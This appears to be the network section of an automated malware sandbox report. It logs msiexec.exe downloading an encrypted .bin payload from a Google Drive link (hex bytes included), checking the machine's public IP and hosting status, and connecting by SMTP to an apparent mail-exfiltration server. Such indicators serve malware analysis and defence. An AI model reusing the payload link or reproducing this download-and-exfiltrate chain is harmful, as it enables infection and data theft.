Nov 5, 2024 16:10:26.627804995 CET	443	49913	172.67.74.152	192.168.2.9
Nov 5, 2024 16:10:26.628032923 CET	443	49913	172.67.74.152	192.168.2.9
Nov 5, 2024 16:10:26.635334969 CET	49913	443	192.168.2.9	172.67.74.152
Nov 5, 2024 16:10:26.679328918 CET	443	49913	172.67.74.152	192.168.2.9
Nov 5, 2024 16:10:26.882175922 CET	443	49913	172.67.74.152	192.168.2.9
Nov 5, 2024 16:10:26.882364988 CET	443	49913	172.67.74.152	192.168.2.9
Nov 5, 2024 16:10:26.882458925 CET	49913	443	192.168.2.9	172.67.74.152
Nov 5, 2024 16:10:26.889931917 CET	49913	443	192.168.2.9	172.67.74.152
Nov 5, 2024 16:10:26.906929016 CET	49919	80	192.168.2.9	208.95.112.1
Nov 5, 2024 16:10:26.912282944 CET	80	49919	208.95.112.1	192.168.2.9
Nov 5, 2024 16:10:26.912353039 CET	49919	80	192.168.2.9	208.95.112.1
Nov 5, 2024 16:10:26.912455082 CET	49919	80	192.168.2.9	208.95.112.1
Nov 5, 2024 16:10:26.917506933 CET	80	49919	208.95.112.1	192.168.2.9
Nov 5, 2024 16:10:27.506899118 CET	80	49919	208.95.112.1	192.168.2.9
Nov 5, 2024 16:10:27.547525883 CET	49919	80	192.168.2.9	208.95.112.1
Nov 5, 2024 16:10:28.904753923 CET	49919	80	192.168.2.9	208.95.112.1
Nov 5, 2024 16:10:28.910810947 CET	80	49919	208.95.112.1	192.168.2.9
Nov 5, 2024 16:10:28.913022041 CET	49919	80	192.168.2.9	208.95.112.1
Nov 5, 2024 16:10:29.205523968 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:29.210424900 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:29.210506916 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:29.785978079 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:29.786206961 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:29.791043997 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:29.941250086 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:29.941703081 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:29.946557045 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.099355936 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.103043079 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:30.108359098 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.264606953 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.266959906 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:30.272027016 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.423809052 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.424019098 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:30.428886890 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.648905993 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.651019096 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:30.659039974 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.807342052 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.807981014 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:30.808031082 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:30.808062077 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:30.808073997 CET	49933	587	192.168.2.9	208.91.199.223
Nov 5, 2024 16:10:30.812908888 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.812994957 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.813112020 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:30.813121080 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:31.091789961 CET	587	49933	208.91.199.223	192.168.2.9
Nov 5, 2024 16:10:31.141311884 CET	49933	587	192.168.2.9	208.91.199.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 16:10:20.368829012 CET	60832	53	192.168.2.9	1.1.1.1
Nov 5, 2024 16:10:20.375813961 CET	53	60832	1.1.1.1	192.168.2.9
Nov 5, 2024 16:10:21.738379002 CET	57452	53	192.168.2.9	1.1.1.1
Nov 5, 2024 16:10:21.744918108 CET	53	57452	1.1.1.1	192.168.2.9
Nov 5, 2024 16:10:25.997361898 CET	53528	53	192.168.2.9	1.1.1.1
Nov 5, 2024 16:10:26.005872965 CET	53	53528	1.1.1.1	192.168.2.9
Nov 5, 2024 16:10:26.897666931 CET	54009	53	192.168.2.9	1.1.1.1
Nov 5, 2024 16:10:26.906153917 CET	53	54009	1.1.1.1	192.168.2.9
Nov 5, 2024 16:10:28.909632921 CET	52909	53	192.168.2.9	1.1.1.1
Nov 5, 2024 16:10:29.193836927 CET	53	52909	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 16:10:20.368829012 CET	192.168.2.9	1.1.1.1	0xb6ac	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:21.738379002 CET	192.168.2.9	1.1.1.1	0x3fdd	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:25.997361898 CET	192.168.2.9	1.1.1.1	0xa6a4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:26.897666931 CET	192.168.2.9	1.1.1.1	0xe9b	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:28.909632921 CET	192.168.2.9	1.1.1.1	0xbea9	Standard query (0)	smtp.santonswitchgears.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 16:09:45.702630997 CET	1.1.1.1	192.168.2.9	0x3a8c	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	azurefd-t-fb-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 16:09:45.702630997 CET	1.1.1.1	192.168.2.9	0x3a8c	No error (0)	dual.s-part-0017.t-0009.fb-t-msedge.net	s-part-0017.t-0009.fb-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 16:09:45.702630997 CET	1.1.1.1	192.168.2.9	0x3a8c	No error (0)	s-part-0017.t-0009.fb-t-msedge.net		13.107.253.45	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:20.375813961 CET	1.1.1.1	192.168.2.9	0xb6ac	No error (0)	drive.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:21.744918108 CET	1.1.1.1	192.168.2.9	0x3fdd	No error (0)	drive.usercontent.google.com		142.250.185.193	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:26.005872965 CET	1.1.1.1	192.168.2.9	0xa6a4	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:26.005872965 CET	1.1.1.1	192.168.2.9	0xa6a4	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:26.005872965 CET	1.1.1.1	192.168.2.9	0xa6a4	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:26.906153917 CET	1.1.1.1	192.168.2.9	0xe9b	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:29.193836927 CET	1.1.1.1	192.168.2.9	0xbea9	No error (0)	smtp.santonswitchgears.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 16:10:29.193836927 CET	1.1.1.1	192.168.2.9	0xbea9	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:29.193836927 CET	1.1.1.1	192.168.2.9	0xbea9	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:29.193836927 CET	1.1.1.1	192.168.2.9	0xbea9	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:10:29.193836927 CET	1.1.1.1	192.168.2.9	0xbea9	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

api.ipify.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49919	208.95.112.1	80	764	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:10:26.912455082 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 5, 2024 16:10:27.506899118 CET	174	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 15:10:27 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49879	216.58.206.46	443	764	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 15:10:21 UTC	208	OUT	GET /uc?export=download&id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do HTTP/1.1 User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-05 15:10:21 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 05 Nov 2024 15:10:21 GMT Location: https://drive.usercontent.google.com/download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-mYzZ75txp-g0nHHhCb6PLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49889	142.250.185.193	443	764	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 15:10:22 UTC	250	OUT	GET /download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download HTTP/1.1 User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-05 15:10:25 UTC	4928	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="FoLGkSjcOLZBQAiJHpnp82.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 246336 Last-Modified: Fri, 11 Oct 2024 11:55:46 GMT X-GUploader-UploadID: AHmUCY0XIejXUWRvbAA6nDijsQjufYWUjIEboGtW0JkLBFETOqa6a3_33kbV9vcwdyxFJSpfaJoxnvKh2w Date: Tue, 05 Nov 2024 15:10:24 GMT Expires: Tue, 05 Nov 2024 15:10:24 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=72DA/g== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-05 15:10:25 UTC	4928	IN	Data Raw: f1 19 03 90 cd ad 06 cd 3a 41 de 4e 95 5c 08 c6 39 dd 03 8b 46 3f a9 fa 9c 25 34 64 fe 51 ba 13 ac 8e 80 d2 75 41 e8 4a 77 5e 3b 11 40 ae 01 d6 27 c9 a8 20 4d a3 af db 74 cd 37 aa 30 85 70 10 58 45 05 4b 9e 84 08 e7 f1 1c 38 48 ca be 04 d0 1d 76 b1 60 9d d8 68 de 4c 5a 70 46 c3 4c b2 25 01 51 24 9e b2 5c a0 56 e7 c5 65 33 92 07 37 84 97 db de b8 c0 7f de 85 e9 cf 14 51 21 d6 e1 5e b5 3e 41 a7 da 9a 19 fe 8b 2d 0f 9e 95 df ad 16 d7 e7 9e a3 3f c6 9b b9 4b 9b fc 45 59 11 3e 50 fb 56 86 03 dc b0 c5 f8 1f fa da 03 06 c5 8e 2a 0a 21 a2 a8 aa 15 5d a3 d7 b4 4d bf 87 72 c7 87 5d c9 1f d1 9e a2 cc a6 de 17 69 72 96 a9 74 64 34 1f b2 69 b0 41 9d 58 9b 30 d5 0d 41 7c d4 a4 51 35 c9 b5 de f2 ef 0f 2d ab 54 20 b0 87 37 53 9d 68 d6 2b 83 ba b6 e5 62 3c a3 bd d3 96 26 Data Ascii: :AN\9F?%4dQuAJw^;@' Mt70pXEK8Hv`hLZpFL%Q$\Ve37Q!^>A-?KEY>PV*!]Mr]irtd4iAX0A\|Q5-T 7Sh+b<&
2024-11-05 15:10:25 UTC	4838	IN	Data Raw: 7b 7d 51 63 e4 96 d5 2f b6 c7 08 00 14 fc dd ac 1e 02 96 f2 26 92 a3 c9 57 c9 c3 0a 5f be 81 d1 9d 98 58 4e 5e 66 42 d5 9c da df c0 83 17 42 75 63 48 1a 50 c7 6b f1 fa 6f 11 a2 ea 3b e4 2b 40 83 80 83 35 64 fa 69 01 33 d2 d3 67 c4 54 d8 e3 be fc 33 97 0a ed dc b4 0b f7 0e b1 6b a8 f0 49 e2 2b 14 5b 52 01 a7 fb c6 f3 86 ba a1 99 e4 46 b6 6d 52 e6 07 1f 55 d8 b6 5f 32 73 3b 82 41 40 dd 29 2a 02 f1 54 c1 e2 56 df b0 e5 3f ae d6 3b a4 cd dc fe d7 58 dd ce a4 ea 88 71 29 76 da 56 8f 75 b1 38 51 42 d5 11 9c 46 cc 8b 4a cf ff de 7d cb aa ad 8f 97 bd 7f a7 30 18 f1 22 8c 4e 9b c4 03 0b ea 25 47 db 5f 8c 2f 34 2c 5f 86 54 10 c3 f6 ce 99 06 d4 c4 c3 6a f8 0e 04 d3 a0 31 2a f1 96 a7 31 4f 4d f3 59 b3 da ba f8 cd c0 28 59 68 c8 9c 6f 26 3f cd ca 9a f8 aa e5 9f 7b 4d Data Ascii: {}Qc/&W_XN^fBBucHPko;+@5di3gT3kI+[RFmRU_2s;A@)TV?;Xq)vVu8QBFJ}0"N%G_/4,_Tj11OMY(Yho&?{M
2024-11-05 15:10:25 UTC	1326	IN	Data Raw: 26 4e 4c 9e d2 2e 9f 31 28 d6 45 2b 44 4d 82 95 1e 8d 05 75 56 f5 d4 f7 d0 47 a1 76 7c 22 4c df d1 1d 37 50 15 50 f7 4c 28 89 a4 9e 20 ed 3c 78 57 c3 5a eb 08 81 64 c5 3a 49 55 cf 25 36 78 1b e7 f0 c4 86 1c ba b4 ae 8e b8 6e 16 10 8d e9 30 68 0c ec 30 d7 db 9e 41 f3 33 c1 86 3b da 8c 6b b5 38 5f 03 94 c9 a4 86 c3 43 ac 0c 7f 4e cd 2f 79 02 84 33 55 89 a1 0b 67 8c 30 3c f5 6e e7 59 cb 53 9f 8f 2a 93 1b d3 a7 01 3e d0 ad 58 1e b4 8a 7f 70 59 cb 5c 89 6f b7 ca 66 ef ca 8d c6 c2 11 e0 e6 42 64 db 07 18 51 d7 0e b6 96 74 49 f3 59 d5 17 85 5c 71 9c d8 a6 ac 34 10 7b 83 65 5b 85 db 9b ac 8b 97 6f 64 5a 37 84 24 71 15 fd 1a df 30 3c 60 61 2f 5b 3d a5 51 20 86 4c f5 6b 9a d6 9c 86 cf cc 10 30 07 72 e6 65 a4 e1 98 a4 d7 a6 ce d3 55 b5 05 bc f2 90 34 b7 15 2b 54 e5 Data Ascii: &NL.1(E+DMuVGv\|"L7PPL( <xWZd:IU%6xn0h0A3;k8_CN/y3Ug0<nYS*>XpY\ofBdQtIY\q4{e[odZ7$q0<`a/[=Q Lk0reU4+T
2024-11-05 15:10:25 UTC	1378	IN	Data Raw: f5 7e 9e 9d be d3 4d 57 fd f2 3c f6 dc 26 c6 73 55 3f a7 24 e4 66 f6 3c be 96 3f b3 be 23 42 8a 23 04 6b 4e c6 33 88 14 50 89 e8 b4 4d bf 79 73 fe a0 0d 8c 1f 2f df a5 cf dd ba 3b 59 10 b6 a8 74 64 34 46 92 68 50 41 9f 01 1d 77 de 0d 40 3a d9 a3 51 1d d5 b5 de f2 11 01 6f 7d 57 de bc ab 37 73 9d 88 d5 2b 7d bb cf ef 62 1c a3 bd f3 95 26 3e 33 05 26 61 e3 9f b5 61 00 6a f0 97 59 ac fe 66 c3 36 0f 6c d9 a8 ee fa b8 d1 cf 4e a9 1a e3 f9 00 3c d0 f0 b8 89 3b 74 ed 30 9e 92 20 1f 07 d0 7c 9d 72 9c 44 ed 93 53 d8 b8 90 f5 87 91 45 75 40 82 eb b8 fc 58 a0 24 b7 f4 6b 95 fa 16 b3 d4 e1 2d 31 0c 35 fa 06 df 2a 51 79 17 80 10 6d 32 0e 9e 9b b2 e1 bd a9 50 88 19 ae 67 78 cc 06 1f 8e 38 b3 7a c6 bc b7 c0 b8 91 a8 25 54 65 b3 db 76 9e cc b2 42 26 8a dd 2c 76 dd 36 b7 Data Ascii: ~MW<&sU?$f<?#B#kN3PMys/;Ytd4FhPAw@:Qo}W7s+}b&>3&aajYf6lN<;t0 \|rDSEu@X$k-15*Qym2Pgx8z%TevB&,v6
2024-11-05 15:10:25 UTC	1378	IN	Data Raw: 9c 6f 56 17 fb ca 9a f2 54 c1 bc 79 b3 9e 65 d9 30 e7 12 3d d6 2b de cc ff 23 57 43 e8 13 d9 00 1a 68 25 23 0b 79 71 bc 96 0b ce 9a e1 6a c7 1b 26 70 7c 6b 5d ff 24 57 f8 55 45 f1 a1 28 74 d9 4b 8e 8d 94 63 e8 e0 1f 3e fb 34 c3 76 f4 e7 49 9c e5 3c fb 86 2b 72 d3 74 ac 82 4b c4 7b 6a 3c 83 d5 e8 5f b7 40 6e 1a 26 d6 f6 23 f7 47 f2 da 7c 73 b0 29 18 23 9c 35 30 b6 62 eb ea 95 f7 63 0d 39 85 b3 03 3e e8 1d 95 82 e1 48 0d e1 f2 f7 4d 80 42 27 3c e2 7f f7 47 46 04 1e 0d 04 ad 56 56 21 23 4e 24 ea 32 aa 60 63 ba 07 17 9b e9 b1 02 58 45 26 15 66 8f 73 ab 1d 65 57 27 8e 5e d9 e8 5c d3 af b4 08 35 fc 32 5f 97 7f 31 95 97 8f ac 15 5e c5 1f 4b 88 7e d6 48 c0 b7 f6 6e 92 15 01 03 e3 5d e6 1b ba 95 a7 8e cf 42 1d d2 21 91 31 45 94 2d 6e 8c 16 ea e3 a2 10 97 27 c5 29 Data Ascii: oVTye0=+#WCh%#yqj&p\|k]$WUE(tKc>4vI<+rtK{j<_@n&#G\|s)#50bc9>HMB'<GFVV!#N$2`cXE&fseW'^\52_1^K~Hn]B!1E-n')
2024-11-05 15:10:25 UTC	1378	IN	Data Raw: 30 50 4b 10 e7 e6 89 4a 86 ec bb 90 4c fd 78 0e 30 c3 cf 99 91 1f e2 43 c5 5d c8 6c 87 ad 32 b3 93 00 1d 01 f0 a0 85 49 f0 b0 39 27 a4 dd 63 1a 62 9e 6c 52 da d4 de 55 e5 62 cf 49 96 f5 2d 20 ed 20 8f 9f 29 fe 26 df 76 60 9e 98 38 61 33 20 c9 1d 9d be 35 a4 3b 81 36 fe dc 40 ee 9b 15 cc 2c ef 4e ac b7 da be 79 04 a1 2a 2a 56 9b b8 33 69 17 33 3b 99 04 bd 56 9c 06 ed af 1e cf 82 8c fa 2b 0d cb 72 1f b5 f0 3d 7d 86 0c ed 36 fa 3e c4 09 a8 bb 82 e8 56 c2 09 fa 45 33 49 c5 3e 33 e6 75 a2 04 f3 4d f3 25 56 07 ca 05 1d ba 00 a3 c7 7b 81 93 85 27 96 92 20 0c 45 47 31 71 44 bb 15 39 39 4a 87 f5 60 78 7c 0a 4b 39 9c 74 7d 71 60 1a 9a d5 d1 98 c6 08 00 ea 0e df 95 30 07 96 f2 0e 61 a2 f0 47 e9 c0 0a a1 b2 7f df 63 94 59 b0 12 b7 bd 0a 63 fa d9 c0 7d 16 85 71 60 48 Data Ascii: 0PKJLx0C]l2I9'cblRUbI- )&v`8a3 5;6@,Ny**V3i3;V+r=}6>VE3I>3uM%V{' EG1qD99J`x\|K9t}q`0aGcYc}q`H
2024-11-05 15:10:25 UTC	1378	IN	Data Raw: 3c 83 d2 63 cc 65 81 30 92 95 de af 63 17 09 26 dc 47 60 dc bc 9e 11 31 28 45 2b ba 59 8e 95 1e 53 0d 79 56 d5 33 f9 d3 47 5f 89 49 2f 4c ff d8 25 ad 55 eb 51 ee 41 28 89 a4 9e 27 e1 3c 03 cd cf 56 ef 11 e5 65 c5 3a 97 5e f6 3e 36 86 15 1a fc c0 78 38 fa b4 8e 82 34 2c 16 ee 8d 2e 1b 68 0c cc c1 de d8 9e 6f eb 3f c1 84 ed 97 80 6b 9f 11 1d 03 94 3d 00 a9 e3 43 ae f2 8f 47 cd 0f ae 0f 84 33 a9 af e3 0b 67 78 14 7d f5 4e e7 a7 c5 52 61 ae 11 b6 1b d3 59 f1 3b d3 ad 76 04 b8 8a 5d 4f 18 cb 5c 7d 46 cc c4 66 e5 6f a3 d8 c7 13 1e c8 5b 64 fb 0c e6 5f db f0 b8 6b 78 45 0d 75 f6 17 a5 57 8f 9d e1 4e ad 0d 30 85 8f 6d a5 ff 9f 9b d7 e5 69 61 69 a4 1a a4 24 0a 72 03 14 d7 5f 79 9e 6d 25 7b 11 a1 51 20 78 bc f7 52 b8 28 90 85 31 e6 18 30 2f 37 18 64 97 cf 88 a4 d7 Data Ascii: <ce0c&G`1(E+YSyV3G_I/L%UQA('<Ve:^>6x84,.ho?k=CG3gx}NRaY;v]O\}Ffo[d_kxEuWN0miai$r_ym%{Q xR(10/7d
2024-11-05 15:10:25 UTC	1378	IN	Data Raw: ce 84 18 50 57 f2 8d 5a bf 87 72 39 8e 0d 8c 64 a2 d2 a3 cb c9 8f 3b 59 1e b6 ad 74 64 34 e1 bc 69 50 41 61 55 90 31 fe 0d 41 c4 d7 5a 50 04 c3 b5 de f2 ef 2f 62 7d 57 20 4e a9 37 53 9d 76 d9 2b 83 9a f2 e5 62 1c 5d bc ea 91 26 3e 33 c3 2d 6d e3 9f 73 3f f3 95 2f 99 59 ac fe 8b f2 0d 0a d1 d9 a8 d6 fe b8 d1 de 56 a9 e0 1c 06 00 3e d0 f0 aa 20 28 44 ef 30 32 9e 20 1f 26 d3 7c 8c 52 62 45 d4 84 ad d6 b8 6e c4 b6 91 3e 06 40 7c e3 d7 8b 78 a0 2e 97 f0 95 94 c3 e2 bd d4 e1 2d ef 01 35 fa 26 23 24 51 79 e9 7f 25 7a 32 2e 9f 65 bb e1 43 88 69 8d 19 ae 4f 0d c9 06 19 ae 03 79 85 39 bd 91 e7 b8 91 50 47 aa 6c 93 da 1c 60 ce 66 43 1f 86 ed 2e 76 4f 3f b7 a2 93 8c ad 06 76 b1 7d 01 e7 89 ab 9a b8 37 86 4c fa 2e d1 52 9b 84 a3 21 4d 52 53 42 9d 21 cf 7a d2 00 73 ea Data Ascii: PWZr9d;Ytd4iPAaU1AZP/b}W N7Sv+b]&>3-ms?/YV> (D02 &\|RbEn>@\|x.-5&#$Qy%z2.eCiOy9PGl`fC.vO?v}7L.R!MRSB!zs
2024-11-05 15:10:25 UTC	1378	IN	Data Raw: a7 79 bc 96 70 44 94 e5 6e b5 3a 2b 74 0c 24 22 ff 24 5d 26 54 7c f4 a1 d6 75 be 77 79 73 6b a4 87 1b e0 c1 05 c6 cc 74 de e6 a7 90 e7 3c db 99 2b 27 a7 8a ab ba 41 c4 7a 79 0c a0 d4 dc 5d b7 be 6c 18 26 c7 28 2f f5 47 d2 2c 72 77 b0 ef e7 1b 99 35 30 48 56 ea ea b5 ff 5b ec c4 84 4d 10 2c e8 1e a5 a6 e1 ef 1f e1 0c f8 4c 80 73 0e 3c e2 7f 09 b7 4c 04 1e cb 9b bb 56 76 22 dd 42 24 14 13 9b 78 63 ba f9 e8 ae e1 b1 22 59 6f 06 1c 14 09 77 55 63 c7 77 23 70 52 d9 16 72 bb af b4 f6 c7 f9 0b 50 9c 7f 31 6b 60 8e 95 27 25 b1 1f b5 81 83 df 60 9e 49 ff 65 ab a5 59 03 e3 7b 85 65 ba 95 53 a8 d7 42 1d 26 50 e1 31 65 99 0d 03 8c e8 eb 24 a2 10 97 27 03 a2 52 c9 4a 59 cb e1 3a be 06 4a 9c c3 c7 f3 cb aa 89 e5 1d 91 0e fb c7 79 9c c6 29 55 bf 49 88 9e 22 bc f8 9d 10 Data Ascii: ypDn:+t$"$]&T\|uwyskt<+'Azy]l&(/G,rw50HV[M,Ls<LVv"B$xc"YowUcw#pRrP1k`'%`IeY{eSB&P1e$'RJY:Jy)UI"
2024-11-05 15:10:25 UTC	1378	IN	Data Raw: 89 85 49 87 4e 37 27 4a dc 9d 16 71 9e 4c 01 da d4 de ab f7 6b c6 49 8f f4 07 00 b7 20 8f 8e f7 f0 26 df 76 60 9c 9b 38 79 1a 21 c9 1d 63 41 00 ad 3b a1 35 d4 fc 6d 10 9a 2c 2d 22 ef 4e 52 45 d7 be 87 2d e1 2a 02 59 65 b9 00 17 04 33 3b b1 da f1 54 9c 26 17 a1 1e cf 7c 7c f5 2b 0d 15 60 1c b5 d0 c7 7c bf 1b 13 37 c3 e3 cd 08 a8 65 ae e8 56 be 2a ae 42 37 b7 e9 23 33 18 79 5d 0a db 4f f3 db 71 f9 c4 25 59 9a 05 a3 39 7a 46 97 86 27 96 46 0c 4a 45 67 33 8f 4a bb eb 38 fe 57 87 f5 40 a3 70 0a 4b 39 93 4c 5f 51 63 1a 64 dc 2f 96 e0 73 74 14 02 d8 e7 ba 04 96 82 26 83 a3 c9 5b 94 b4 0a 5f ba 5f f9 9d 98 58 4e 5c 66 42 f5 62 d6 df c0 5d 1d 7b 7f 63 b6 1b 69 ed 6a f1 fa 45 cf a0 ea 3b e4 2b 42 83 80 a3 c7 68 fa 69 df 70 eb d6 67 3a 55 d9 f1 be fc 33 51 51 12 23 Data Ascii: IN7'JqLkI &v`8y!cA;5m,-"NRE-Ye3;T&\|\|+`\|7eVB7#3y]Oq%Y9zF'FJEg3J8W@pK9L_Qcd/st&[__XN\fBb]{cijE;+Bhipg:U3QQ#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
